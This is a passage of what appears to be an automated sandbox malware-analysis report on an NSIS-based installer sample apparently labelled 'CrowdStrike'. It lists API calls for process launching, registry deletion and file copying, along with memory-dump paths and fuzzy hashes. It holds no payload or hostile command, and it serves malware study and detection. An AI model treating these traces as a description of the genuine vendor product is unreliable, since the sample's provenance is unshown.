                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                        Strings
                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                        • Exec: command="%s", xrefs: 00402241
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                        • API String ID: 2014279497-3433828417
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                        • GetMessagePos.USER32 ref: 00404871
                                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                        • MulDiv.KERNEL32(0000D200,00000064,?), ref: 00403295
                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                        • wsprintfW.USER32 ref: 00404457
                                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s$@rD
                                                                        • API String ID: 3540041739-1813061909
                                                                        • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                        • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: *?|<>/":
                                                                        • API String ID: 589700163-165019052
                                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                        APIs
                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                        • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                        APIs
                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                        • API String ID: 1697273262-1764544995
                                                                        • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                        • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00404902
                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID: $@rD
                                                                        • API String ID: 3748168415-881980237
                                                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                        • API String ID: 2577523808-3778932970
                                                                        • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                        • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatwsprintf
                                                                        • String ID: %02x%c$...
                                                                        • API String ID: 3065427908-1057055748
                                                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                        APIs
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                        • String ID: <RM>$MostIsrael$WriteINIStr: wrote [%s] %s=%s in %s
                                                                        • API String ID: 247603264-1334740661
                                                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                        • API String ID: 2266616436-4211696005
                                                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00402100
                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                        • String ID:
                                                                        • API String ID: 1599320355-0
                                                                        • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                        • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                        APIs
                                                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                        • String ID: Version
                                                                        • API String ID: 512980652-315105994
                                                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
